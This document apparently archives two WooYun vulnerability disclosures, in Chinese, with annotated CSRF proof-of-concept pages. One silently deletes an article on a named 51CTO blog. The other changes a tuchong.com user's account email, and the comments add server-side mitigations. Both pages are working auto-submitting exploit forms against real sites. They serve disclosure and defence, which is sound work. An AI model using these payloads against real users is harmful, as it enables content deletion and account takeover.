http://wooyun.org/bugs/wooyun-2010-052368

积极反馈给51CTO修复了。

该漏洞可被用来删除不属于自己的文章:下面的表单是一个跨站请求伪造(CSRF)概念验证,已登录的用户打开页面后会自动提交删除请求。

<!--
  CSRF proof of concept from the report above (article deletion on a 51CTO blog).
  The form sends a cross-site POST to user_index.php?action=delarticle with only
  two fields: job=del and selid (the id of the article to delete). No anti-CSRF
  token field is part of the request; presumably the endpoint relied on the
  session cookie alone, which the browser attaches on its own (confirm against
  the original report).
  Server-side mitigation: require an unpredictable per-session token on every
  state-changing request, validate the Origin/Referer header, and issue the
  session cookie with SameSite=Lax or Strict.
-->
<form method='post'action='http://crazysmogu.blog.51cto.com/user_index.php?action=delarticle'>
<!--
  Both inputs are type=text but hidden by the inline style: display:none!important
  overrides the later display:block, and width=0 / height=0 are not valid CSS
  declarations. A visitor therefore sees no form at all.
-->
<input type='text'value='del'name='job'style='display:none!important;display:block;width=0;height=0'/>
<input type='text'value='1112261'name='selid'style='display:none!important;display:block;width=0;height=0'/>
</form>
<!--
  Submits the form as soon as this script is parsed, with no user interaction.
  document.forms[0] refers to this form only while it is the first form in the
  document.
-->
<script>document.forms[0].submit();</script>


wKioL1MxHi7xA2QeAAC0IklwNCk782.jpg

<!--
  CSRF proof of concept against the tuchong.com profile API: a form that posts
  to /api/user/modify/ and is submitted by script without any user action.
  The request consists of section=basicinfo plus a user_email value and contains
  no anti-CSRF token field. An e-mail change is a sensitive action (password
  recovery is commonly bound to the address; verify for this site), so besides a
  per-session token, Origin/Referer validation and SameSite cookies, the endpoint
  should ask for the current password or confirm the change via the old address.
-->
<html>
<body>
<!-- Named form, so the script at the bottom can reach it as document.csrf. -->
<form name="csrf" action="http://tuchong.com/api/user/modify/" method="POST">
<input type=text name=section value="basicinfo"></input>
<script>
// Ten placeholder addresses; one of them is picked on each page load.
var email =['root1@wooyun.org','root2@wooyun.org','root3@wooyun.org','root4@wooyun.org','root5@wooyun.org','root6@wooyun.org','root7@wooyun.org','root8@wooyun.org','root9@wooyun.org','root10@wooyun.org'];
// Reorders arr in place using a random comparator and returns its first len
// elements as a new array. NOTE(review): a random comparator does not produce
// a uniform shuffle; that only affects which placeholder value gets picked.
function Rand(arr, len) {
   arr.sort(function () {
       return Math.random()-0.5;
   });
   return arr.slice(0, len);
}
//alert(Rand(email,1));
// Executes while the form is still being parsed, so the generated user_email
// input becomes a child of the form. Rand() returns a one-element array, which
// string concatenation turns into the bare address. The attribute value is left
// unquoted, which is harmless here only because it comes from the fixed list.
document.write("<input type=text name=user_email value="+Rand(email,1)+"></input>");
</script>
<input type="submit" value="submit" />
</form>
<script>
// Auto-submit on load: the browser sends the POST along with whatever cookies
// it is allowed to attach for the target origin.
document.csrf.submit();
</script>
</body>
</html>